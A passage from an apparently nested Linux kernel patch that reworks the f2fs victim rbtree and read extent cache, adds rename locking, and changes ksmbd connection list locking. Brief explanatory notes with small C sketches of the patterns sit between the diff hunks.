+-				struct rb_node *parent, struct rb_node **p,
+-				bool left_most)
++static bool f2fs_check_victim_tree(struct f2fs_sb_info *sbi,
++				struct rb_root_cached *root)
++{
++#ifdef CONFIG_F2FS_CHECK_FS
++	struct rb_node *cur = rb_first_cached(root), *next;
++	struct victim_entry *cur_ve, *next_ve;
++
++	while (cur) {
++		next = rb_next(cur);
++		if (!next)
++			return true;
++
++		cur_ve = rb_entry(cur, struct victim_entry, rb_node);
++		next_ve = rb_entry(next, struct victim_entry, rb_node);
++
++		if (cur_ve->mtime > next_ve->mtime) {
++			f2fs_info(sbi, "broken victim_rbtree, "
++				"cur_mtime(%llu) next_mtime(%llu)",
++				cur_ve->mtime, next_ve->mtime);
++			return false;
++		}
++		cur = next;
++	}
++#endif
++	return true;
++}
++
++static struct victim_entry *__lookup_victim_entry(struct f2fs_sb_info *sbi,
++					unsigned long long mtime)
++{
++	struct atgc_management *am = &sbi->am;
++	struct rb_node *node = am->root.rb_root.rb_node;
++	struct victim_entry *ve = NULL;
++
++	while (node) {
++		ve = rb_entry(node, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime)
++			node = node->rb_left;
++		else
++			node = node->rb_right;
++	}
++	return ve;
++}
++
++static struct victim_entry *__create_victim_entry(struct f2fs_sb_info *sbi,
++		unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+ 	struct victim_entry *ve;
+ 
+-	ve =  f2fs_kmem_cache_alloc(victim_entry_slab,
+-				GFP_NOFS, true, NULL);
++	ve =  f2fs_kmem_cache_alloc(victim_entry_slab, GFP_NOFS, true, NULL);
+ 
+ 	ve->mtime = mtime;
+ 	ve->segno = segno;
+ 
+-	rb_link_node(&ve->rb_node, parent, p);
+-	rb_insert_color_cached(&ve->rb_node, &am->root, left_most);
+-
+ 	list_add_tail(&ve->list, &am->victim_list);
+-
+ 	am->victim_count++;
+ 
+ 	return ve;
+ }
+ 
+-static void insert_victim_entry(struct f2fs_sb_info *sbi,
++static void __insert_victim_entry(struct f2fs_sb_info *sbi,
+ 				unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node **p;
++	struct rb_root_cached *root = &am->root;
++	struct rb_node **p = &root->rb_root.rb_node;
+ 	struct rb_node *parent = NULL;
++	struct victim_entry *ve;
+ 	bool left_most = true;
+ 
+-	p = f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, mtime, &left_most);
+-	attach_victim_entry(sbi, mtime, segno, parent, p, left_most);
++	/* look up rb tree to find parent node */
++	while (*p) {
++		parent = *p;
++		ve = rb_entry(parent, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime) {
++			p = &(*p)->rb_left;
++		} else {
++			p = &(*p)->rb_right;
++			left_most = false;
++		}
++	}
++
++	ve = __create_victim_entry(sbi, mtime, segno);
++
++	rb_link_node(&ve->rb_node, parent, p);
++	rb_insert_color_cached(&ve->rb_node, root, left_most);
+ }
+ 
+ static void add_victim_entry(struct f2fs_sb_info *sbi,
+@@ -458,19 +513,7 @@ static void add_victim_entry(struct f2fs_sb_info *sbi,
+ 	if (sit_i->dirty_max_mtime - mtime < p->age_threshold)
+ 		return;
+ 
+-	insert_victim_entry(sbi, mtime, segno);
+-}
+-
+-static struct rb_node *lookup_central_victim(struct f2fs_sb_info *sbi,
+-						struct victim_sel_policy *p)
+-{
+-	struct atgc_management *am = &sbi->am;
+-	struct rb_node *parent = NULL;
+-	bool left_most;
+-
+-	f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, p->age, &left_most);
+-
+-	return parent;
++	__insert_victim_entry(sbi, mtime, segno);
+ }
+ 
+ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+@@ -480,7 +523,6 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 	struct atgc_management *am = &sbi->am;
+ 	struct rb_root_cached *root = &am->root;
+ 	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long total_time;
+ 	unsigned long long age, u, accu;
+@@ -507,12 +549,10 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 
+ 	node = rb_first_cached(root);
+ next:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re)
++	ve = rb_entry_safe(node, struct victim_entry, rb_node);
++	if (!ve)
+ 		return;
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip;
+ 
+@@ -554,8 +594,6 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ {
+ 	struct sit_info *sit_i = SIT_I(sbi);
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long age;
+ 	unsigned long long max_mtime = sit_i->dirty_max_mtime;
+@@ -565,25 +603,22 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ 	unsigned int dirty_threshold = max(am->max_candidate_count,
+ 					am->candidate_ratio *
+ 					am->victim_count / 100);
+-	unsigned int cost;
+-	unsigned int iter = 0;
++	unsigned int cost, iter;
+ 	int stage = 0;
+ 
+ 	if (max_mtime < min_mtime)
+ 		return;
+ 	max_mtime += 1;
+ next_stage:
+-	node = lookup_central_victim(sbi, p);
++	iter = 0;
++	ve = __lookup_victim_entry(sbi, p->age);
+ next_node:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re) {
+-		if (stage == 0)
+-			goto skip_stage;
++	if (!ve) {
++		if (stage++ == 0)
++			goto next_stage;
+ 		return;
+ 	}
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip_node;
+ 
+@@ -609,24 +644,20 @@ next_node:
+ 	}
+ skip_node:
+ 	if (iter < dirty_threshold) {
+-		if (stage == 0)
+-			node = rb_prev(node);
+-		else if (stage == 1)
+-			node = rb_next(node);
++		ve = rb_entry(stage == 0 ? rb_prev(&ve->rb_node) :
++					rb_next(&ve->rb_node),
++					struct victim_entry, rb_node);
+ 		goto next_node;
+ 	}
+-skip_stage:
+-	if (stage < 1) {
+-		stage++;
+-		iter = 0;
++
++	if (stage++ == 0)
+ 		goto next_stage;
+-	}
+ }
++
+ static void lookup_victim_by_age(struct f2fs_sb_info *sbi,
+ 						struct victim_sel_policy *p)
+ {
+-	f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-						&sbi->am.root, true));
++	f2fs_bug_on(sbi, !f2fs_check_victim_tree(sbi, &sbi->am.root));
+ 
+ 	if (p->gc_mode == GC_AT)
+ 		atgc_lookup_victim(sbi, p);
+@@ -1147,7 +1178,7 @@ static int ra_data_block(struct inode *inode, pgoff_t index)
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct dnode_of_data dn;
+ 	struct page *page;
+-	struct extent_info ei = {0, 0, 0};
++	struct extent_info ei = {0, };
+ 	struct f2fs_io_info fio = {
+ 		.sbi = sbi,
+ 		.ino = inode->i_ino,
+@@ -1165,7 +1196,7 @@ static int ra_data_block(struct inode *inode, pgoff_t index)
+ 	if (!page)
+ 		return -ENOMEM;
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 		if (unlikely(!f2fs_is_valid_blkaddr(sbi, dn.data_blkaddr,
+ 						DATA_GENERIC_ENHANCE_READ))) {
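
The gc.c rework above drops the generic rb_entry/f2fs_lookup_rb_tree_ext
layer in favor of open-coded walks over a cached rbtree. For readers less
familiar with rb_root_cached, this is the insertion pattern the new
__insert_victim_entry() follows, reduced to a self-contained kernel-style
sketch (struct and function names here are illustrative):

#include <linux/rbtree.h>

struct victim_sketch {
	struct rb_node rb_node;
	unsigned long long mtime;
};

/*
 * Insert @ve keyed by mtime. Track whether we ever went right: only a
 * node reached purely by left turns can be the new leftmost, which
 * rb_insert_color_cached() uses to maintain root->rb_leftmost.
 */
static void sketch_insert(struct rb_root_cached *root,
			  struct victim_sketch *ve)
{
	struct rb_node **p = &root->rb_root.rb_node;
	struct rb_node *parent = NULL;
	bool leftmost = true;

	while (*p) {
		struct victim_sketch *cur;

		parent = *p;
		cur = rb_entry(parent, struct victim_sketch, rb_node);
		if (ve->mtime < cur->mtime) {
			p = &(*p)->rb_left;
		} else {
			p = &(*p)->rb_right;
			leftmost = false;
		}
	}
	rb_link_node(&ve->rb_node, parent, p);
	rb_insert_color_cached(&ve->rb_node, root, leftmost);
}
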
+diff --git a/fs/f2fs/gc.h b/fs/f2fs/gc.h
+index 19b956c2d697a..ca84024b9c9e7 100644
+--- a/fs/f2fs/gc.h
++++ b/fs/f2fs/gc.h
+@@ -55,20 +55,10 @@ struct gc_inode_list {
+ 	struct radix_tree_root iroot;
+ };
+ 
+-struct victim_info {
+-	unsigned long long mtime;	/* mtime of section */
+-	unsigned int segno;		/* section No. */
+-};
+-
+ struct victim_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned long long mtime;	/* mtime of section */
+-			unsigned int segno;		/* segment No. */
+-		};
+-		struct victim_info vi;	/* victim info */
+-	};
++	unsigned long long mtime;	/* mtime of section */
++	unsigned int segno;		/* segment No. */
+ 	struct list_head list;
+ };
+ 
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 229ddc2f7b079..aab3b8b3ab0a7 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -262,22 +262,6 @@ static bool sanity_check_inode(struct inode *inode, struct page *node_page)
+ 		return false;
+ 	}
+ 
+-	if (fi->extent_tree) {
+-		struct extent_info *ei = &fi->extent_tree->largest;
+-
+-		if (ei->len &&
+-			(!f2fs_is_valid_blkaddr(sbi, ei->blk,
+-						DATA_GENERIC_ENHANCE) ||
+-			!f2fs_is_valid_blkaddr(sbi, ei->blk + ei->len - 1,
+-						DATA_GENERIC_ENHANCE))) {
+-			set_sbi_flag(sbi, SBI_NEED_FSCK);
+-			f2fs_warn(sbi, "%s: inode (ino=%lx) extent info [%u, %u, %u] is incorrect, run fsck to fix",
+-				  __func__, inode->i_ino,
+-				  ei->blk, ei->fofs, ei->len);
+-			return false;
+-		}
+-	}
+-
+ 	if (f2fs_sanity_check_inline_data(inode)) {
+ 		set_sbi_flag(sbi, SBI_NEED_FSCK);
+ 		f2fs_warn(sbi, "%s: inode (ino=%lx, mode=%u) should not have inline_data, run fsck to fix",
+@@ -392,8 +376,6 @@ static int do_read_inode(struct inode *inode)
+ 	fi->i_pino = le32_to_cpu(ri->i_pino);
+ 	fi->i_dir_level = ri->i_dir_level;
+ 
+-	f2fs_init_extent_tree(inode, node_page);
+-
+ 	get_inline_info(inode, ri);
+ 
+ 	fi->i_extra_isize = f2fs_has_extra_attr(inode) ?
+@@ -415,12 +397,6 @@ static int do_read_inode(struct inode *inode)
+ 		fi->i_inline_xattr_size = 0;
+ 	}
+ 
+-	if (!sanity_check_inode(inode, node_page)) {
+-		f2fs_put_page(node_page, 1);
+-		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	/* check data exist */
+ 	if (f2fs_has_inline_data(inode) && !f2fs_exist_data(inode))
+ 		__recover_inline_status(inode, node_page);
+@@ -479,6 +455,22 @@ static int do_read_inode(struct inode *inode)
+ 	}
+ 
+ 	init_idisk_time(inode);
++
++	/* Need all the flag bits */
++	f2fs_init_read_extent_tree(inode, node_page);
++
++	if (!sanity_check_inode(inode, node_page)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
++	if (!sanity_check_extent_cache(inode)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
+ 	f2fs_put_page(node_page, 1);
+ 
+ 	stat_inc_inline_xattr(inode);
+@@ -607,7 +599,7 @@ retry:
+ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ {
+ 	struct f2fs_inode *ri;
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[EX_READ];
+ 
+ 	f2fs_wait_on_page_writeback(node_page, NODE, true, true);
+ 	set_page_dirty(node_page);
+@@ -629,7 +621,7 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 
+ 	if (et) {
+ 		read_lock(&et->lock);
+-		set_raw_extent(&et->largest, &ri->i_ext);
++		set_raw_read_extent(&et->largest, &ri->i_ext);
+ 		read_unlock(&et->lock);
+ 	} else {
+ 		memset(&ri->i_ext, 0, sizeof(ri->i_ext));
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index b6c14c9c33a08..d879a295b688e 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -258,8 +258,6 @@ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+ 	}
+ 	F2FS_I(inode)->i_inline_xattr_size = xattr_size;
+ 
+-	f2fs_init_extent_tree(inode, NULL);
+-
+ 	F2FS_I(inode)->i_flags =
+ 		f2fs_mask_flags(mode, F2FS_I(dir)->i_flags & F2FS_FL_INHERITED);
+ 
+@@ -282,6 +280,8 @@ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+ 
+ 	f2fs_set_inode_flags(inode);
+ 
++	f2fs_init_extent_tree(inode);
++
+ 	trace_f2fs_new_inode(inode, 0);
+ 	return inode;
+ 
+@@ -1002,12 +1002,20 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			goto out;
+ 	}
+ 
++	/*
++	 * Copied from ext4_rename: we need to protect against old.inode
++	 * directory getting converted from inline directory format into
++	 * a normal one.
++	 */
++	if (S_ISDIR(old_inode->i_mode))
++		inode_lock_nested(old_inode, I_MUTEX_NONDIR2);
++
+ 	err = -ENOENT;
+ 	old_entry = f2fs_find_entry(old_dir, &old_dentry->d_name, &old_page);
+ 	if (!old_entry) {
+ 		if (IS_ERR(old_page))
+ 			err = PTR_ERR(old_page);
+-		goto out;
++		goto out_unlock_old;
+ 	}
+ 
+ 	if (S_ISDIR(old_inode->i_mode)) {
+@@ -1115,6 +1123,9 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	f2fs_unlock_op(sbi);
+ 
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
++
+ 	if (IS_DIRSYNC(old_dir) || IS_DIRSYNC(new_dir))
+ 		f2fs_sync_fs(sbi->sb, 1);
+ 
+@@ -1129,6 +1140,9 @@ out_dir:
+ 		f2fs_put_page(old_dir_page, 0);
+ out_old:
+ 	f2fs_put_page(old_page, 0);
++out_unlock_old:
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
+ out:
+ 	iput(whiteout);
+ 	return err;
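
The rename hunk above adds the same guard ext4 uses: take old_inode's lock
in the I_MUTEX_NONDIR2 class for directories, so the source directory
cannot be converted out of inline format mid-rename, and release it on
both the success path and the new out_unlock_old error path. The locking
skeleton, as a hedged sketch (not the full function):

#include <linux/fs.h>

static int rename_lock_sketch(struct inode *old_inode)
{
	int err = 0;

	if (S_ISDIR(old_inode->i_mode))
		inode_lock_nested(old_inode, I_MUTEX_NONDIR2);

	/* ... look up entries, move them, update the parents ... */

	if (S_ISDIR(old_inode->i_mode))
		inode_unlock(old_inode);
	return err;
}
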
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index b9ee5a1176a07..07419c3e42a52 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -85,10 +85,12 @@ bool f2fs_available_free_memory(struct f2fs_sb_info *sbi, int type)
+ 						sizeof(struct ino_entry);
+ 		mem_size >>= PAGE_SHIFT;
+ 		res = mem_size < ((avail_ram * nm_i->ram_thresh / 100) >> 1);
+-	} else if (type == EXTENT_CACHE) {
+-		mem_size = (atomic_read(&sbi->total_ext_tree) *
++	} else if (type == READ_EXTENT_CACHE) {
++		struct extent_tree_info *eti = &sbi->extent_tree[EX_READ];
++
++		mem_size = (atomic_read(&eti->total_ext_tree) *
+ 				sizeof(struct extent_tree) +
+-				atomic_read(&sbi->total_ext_node) *
++				atomic_read(&eti->total_ext_node) *
+ 				sizeof(struct extent_node)) >> PAGE_SHIFT;
+ 		res = mem_size < ((avail_ram * nm_i->ram_thresh / 100) >> 1);
+ 	} else if (type == DISCARD_CACHE) {
+@@ -859,7 +861,7 @@ int f2fs_get_dnode_of_data(struct dnode_of_data *dn, pgoff_t index, int mode)
+ 			blkaddr = data_blkaddr(dn->inode, dn->node_page,
+ 						dn->ofs_in_node + 1);
+ 
+-		f2fs_update_extent_tree_range_compressed(dn->inode,
++		f2fs_update_read_extent_tree_range_compressed(dn->inode,
+ 					index, blkaddr,
+ 					F2FS_I(dn->inode)->i_cluster_size,
+ 					c_len);
+diff --git a/fs/f2fs/node.h b/fs/f2fs/node.h
+index 3c09cae058b0a..0aa48704c77a0 100644
+--- a/fs/f2fs/node.h
++++ b/fs/f2fs/node.h
+@@ -146,7 +146,7 @@ enum mem_type {
+ 	NAT_ENTRIES,	/* indicates the cached nat entry */
+ 	DIRTY_DENTS,	/* indicates dirty dentry pages */
+ 	INO_ENTRIES,	/* indicates inode entries */
+-	EXTENT_CACHE,	/* indicates extent cache */
++	READ_EXTENT_CACHE,	/* indicates read extent cache */
+ 	DISCARD_CACHE,	/* indicates memory of cached discard cmds */
+ 	COMPRESS_PAGE,	/* indicates memory of cached compressed pages */
+ 	BASE_CHECK,	/* check kernel status */
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index b0fbdee16a96c..cbbf95b995414 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -262,7 +262,7 @@ retry:
+ 	f2fs_put_dnode(&dn);
+ 
+ 	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
+-					index, *old_addr, new_addr, recover);
++			index, old_addr ? *old_addr : 0, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -452,8 +452,9 @@ void f2fs_balance_fs_bg(struct f2fs_sb_info *sbi, bool from_bg)
+ 		return;
+ 
+ 	/* try to shrink extent cache when there is no enough memory */
+-	if (!f2fs_available_free_memory(sbi, EXTENT_CACHE))
+-		f2fs_shrink_extent_tree(sbi, EXTENT_CACHE_SHRINK_NUMBER);
++	if (!f2fs_available_free_memory(sbi, READ_EXTENT_CACHE))
++		f2fs_shrink_read_extent_tree(sbi,
++				READ_EXTENT_CACHE_SHRINK_NUMBER);
+ 
+ 	/* check the # of cached NAT entries */
+ 	if (!f2fs_available_free_memory(sbi, NAT_ENTRIES))
+@@ -1473,7 +1474,7 @@ retry:
+ 			goto next;
+ 		if (unlikely(dcc->rbtree_check))
+ 			f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 		blk_start_plug(&plug);
+ 		list_for_each_entry_safe(dc, tmp, pend_list, list) {
+ 			f2fs_bug_on(sbi, dc->state != D_PREP);
+@@ -3001,7 +3002,7 @@ next:
+ 	mutex_lock(&dcc->cmd_lock);
+ 	if (unlikely(dcc->rbtree_check))
+ 		f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 
+ 	dc = (struct discard_cmd *)f2fs_lookup_rb_tree_ret(&dcc->root,
+ 					NULL, start,
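
One small but easy-to-miss fix above: the surrounding helper can be called
with a NULL old_addr, and tracepoint arguments are evaluated
unconditionally, so the guard has to live at the call site. The pattern in
isolation (a sketch with illustrative names):

#include <linux/types.h>

static inline void trace_replace_sketch(u32 old_blk, u32 new_blk) { }

static void replace_block_sketch(u32 *old_addr, u32 new_addr)
{
	/* old_addr may be NULL when no previous block is recorded */
	trace_replace_sketch(old_addr ? *old_addr : 0, new_addr);
}
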
+diff --git a/fs/f2fs/shrinker.c b/fs/f2fs/shrinker.c
+index dd3c3c7a90ec8..33c490e69ae30 100644
+--- a/fs/f2fs/shrinker.c
++++ b/fs/f2fs/shrinker.c
+@@ -28,10 +28,13 @@ static unsigned long __count_free_nids(struct f2fs_sb_info *sbi)
+ 	return count > 0 ? count : 0;
+ }
+ 
+-static unsigned long __count_extent_cache(struct f2fs_sb_info *sbi)
++static unsigned long __count_extent_cache(struct f2fs_sb_info *sbi,
++					enum extent_type type)
+ {
+-	return atomic_read(&sbi->total_zombie_tree) +
+-				atomic_read(&sbi->total_ext_node);
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
++
++	return atomic_read(&eti->total_zombie_tree) +
++				atomic_read(&eti->total_ext_node);
+ }
+ 
+ unsigned long f2fs_shrink_count(struct shrinker *shrink,
+@@ -53,8 +56,8 @@ unsigned long f2fs_shrink_count(struct shrinker *shrink,
+ 		}
+ 		spin_unlock(&f2fs_list_lock);
+ 
+-		/* count extent cache entries */
+-		count += __count_extent_cache(sbi);
++		/* count read extent cache entries */
++		count += __count_extent_cache(sbi, EX_READ);
+ 
+ 		/* count clean nat cache entries */
+ 		count += __count_nat_entries(sbi);
+@@ -99,8 +102,8 @@ unsigned long f2fs_shrink_scan(struct shrinker *shrink,
+ 
+ 		sbi->shrinker_run_no = run_no;
+ 
+-		/* shrink extent cache entries */
+-		freed += f2fs_shrink_extent_tree(sbi, nr >> 1);
++		/* shrink read extent cache entries */
++		freed += f2fs_shrink_read_extent_tree(sbi, nr >> 1);
+ 
+ 		/* shrink clean nat cache entries */
+ 		if (freed < nr)
+@@ -130,7 +133,7 @@ void f2fs_join_shrinker(struct f2fs_sb_info *sbi)
+ 
+ void f2fs_leave_shrinker(struct f2fs_sb_info *sbi)
+ {
+-	f2fs_shrink_extent_tree(sbi, __count_extent_cache(sbi));
++	f2fs_shrink_read_extent_tree(sbi, __count_extent_cache(sbi, EX_READ));
+ 
+ 	spin_lock(&f2fs_list_lock);
+ 	list_del_init(&sbi->s_list);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 5af05411818a5..c46533d65372c 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -810,10 +810,10 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 			set_opt(sbi, FASTBOOT);
+ 			break;
+ 		case Opt_extent_cache:
+-			set_opt(sbi, EXTENT_CACHE);
++			set_opt(sbi, READ_EXTENT_CACHE);
+ 			break;
+ 		case Opt_noextent_cache:
+-			clear_opt(sbi, EXTENT_CACHE);
++			clear_opt(sbi, READ_EXTENT_CACHE);
+ 			break;
+ 		case Opt_noinline_data:
+ 			clear_opt(sbi, INLINE_DATA);
+@@ -1939,7 +1939,7 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 		seq_puts(seq, ",nobarrier");
+ 	if (test_opt(sbi, FASTBOOT))
+ 		seq_puts(seq, ",fastboot");
+-	if (test_opt(sbi, EXTENT_CACHE))
++	if (test_opt(sbi, READ_EXTENT_CACHE))
+ 		seq_puts(seq, ",extent_cache");
+ 	else
+ 		seq_puts(seq, ",noextent_cache");
+@@ -2057,7 +2057,7 @@ static void default_options(struct f2fs_sb_info *sbi)
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
+-	set_opt(sbi, EXTENT_CACHE);
++	set_opt(sbi, READ_EXTENT_CACHE);
+ 	set_opt(sbi, NOHEAP);
+ 	clear_opt(sbi, DISABLE_CHECKPOINT);
+ 	set_opt(sbi, MERGE_CHECKPOINT);
+@@ -2198,7 +2198,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 	bool need_restart_ckpt = false, need_stop_ckpt = false;
+ 	bool need_restart_flush = false, need_stop_flush = false;
+ 	bool need_restart_discard = false, need_stop_discard = false;
+-	bool no_extent_cache = !test_opt(sbi, EXTENT_CACHE);
++	bool no_read_extent_cache = !test_opt(sbi, READ_EXTENT_CACHE);
+ 	bool enable_checkpoint = !test_opt(sbi, DISABLE_CHECKPOINT);
+ 	bool no_io_align = !F2FS_IO_ALIGNED(sbi);
+ 	bool no_atgc = !test_opt(sbi, ATGC);
+@@ -2288,7 +2288,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 	}
+ 
+ 	/* disallow enable/disable extent_cache dynamically */
+-	if (no_extent_cache == !!test_opt(sbi, EXTENT_CACHE)) {
++	if (no_read_extent_cache == !!test_opt(sbi, READ_EXTENT_CACHE)) {
+ 		err = -EINVAL;
+ 		f2fs_warn(sbi, "switch extent_cache option is not allowed");
+ 		goto restore_opts;
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index aa33c39be1829..d387708977a50 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -827,7 +827,7 @@ void wbc_detach_inode(struct writeback_control *wbc)
+ 		 * is okay.  The main goal is avoiding keeping an inode on
+ 		 * the wrong wb for an extended period of time.
+ 		 */
+-		if (hweight32(history) > WB_FRN_HIST_THR_SLOTS)
++		if (hweight16(history) > WB_FRN_HIST_THR_SLOTS)
+ 			inode_switch_wbs(inode, max_id);
+ 	}
+ 
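
The fs-writeback one-liner is a width fix: per this change, the foreign
node history being tested is a 16-bit slot bitmap, so hweight16() matches
the field while hweight32() only worked by accident. Counting set bits in
a 16-bit value, as a standalone sketch using the compiler builtin that
backs the kernel helper:

#include <stdint.h>
#include <stdio.h>

static unsigned int hweight16_sketch(uint16_t history)
{
	/* population count of the low 16 bits only */
	return (unsigned int)__builtin_popcount(history);
}

int main(void)
{
	printf("%u\n", hweight16_sketch(0xf00f));	/* prints 8 */
	return 0;
}
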
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index b8f9d627f241d..e3312fbf4c090 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -20,7 +20,7 @@ static DEFINE_MUTEX(init_lock);
+ static struct ksmbd_conn_ops default_conn_ops;
+ 
+ LIST_HEAD(conn_list);
+-DEFINE_RWLOCK(conn_list_lock);
++DECLARE_RWSEM(conn_list_lock);
+ 
+ /**
+  * ksmbd_conn_free() - free resources of the connection instance
+@@ -32,9 +32,9 @@ DEFINE_RWLOCK(conn_list_lock);
+  */
+ void ksmbd_conn_free(struct ksmbd_conn *conn)
+ {
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_del(&conn->conns_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 
+ 	xa_destroy(&conn->sessions);
+ 	kvfree(conn->request_buf);
+@@ -56,7 +56,7 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 		return NULL;
+ 
+ 	conn->need_neg = true;
+-	conn->status = KSMBD_SESS_NEW;
++	ksmbd_conn_set_new(conn);
+ 	conn->local_nls = load_nls("utf8");
+ 	if (!conn->local_nls)
+ 		conn->local_nls = load_nls_default();
+@@ -84,9 +84,9 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 	spin_lock_init(&conn->llist_lock);
+ 	INIT_LIST_HEAD(&conn->lock_list);
+ 
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_add(&conn->conns_list, &conn_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 	return conn;
+ }
+ 
+@@ -95,7 +95,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 	struct ksmbd_conn *t;
+ 	bool ret = false;
+ 
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(t, &conn_list, conns_list) {
+ 		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
+ 			continue;
+@@ -103,7 +103,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 		ret = true;
+ 		break;
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 	return ret;
+ }
+ 
+@@ -149,19 +149,47 @@ int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+ 	return ret;
+ }
+ 
+-static void ksmbd_conn_lock(struct ksmbd_conn *conn)
++void ksmbd_conn_lock(struct ksmbd_conn *conn)
+ {
+ 	mutex_lock(&conn->srv_mutex);
+ }
+ 
+-static void ksmbd_conn_unlock(struct ksmbd_conn *conn)
++void ksmbd_conn_unlock(struct ksmbd_conn *conn)
+ {
+ 	mutex_unlock(&conn->srv_mutex);
+ }
+ 
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn)
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+ {
++	struct ksmbd_conn *conn;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		if (conn->binding || xa_load(&conn->sessions, sess_id))
++			WRITE_ONCE(conn->status, status);
++	}
++	up_read(&conn_list_lock);
++}
++
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
++{
++	struct ksmbd_conn *bind_conn;
++
+ 	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(bind_conn, &conn_list, conns_list) {
++		if (bind_conn == conn)
++			continue;
++
++		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
++		    !ksmbd_conn_releasing(bind_conn) &&
++		    atomic_read(&bind_conn->req_running)) {
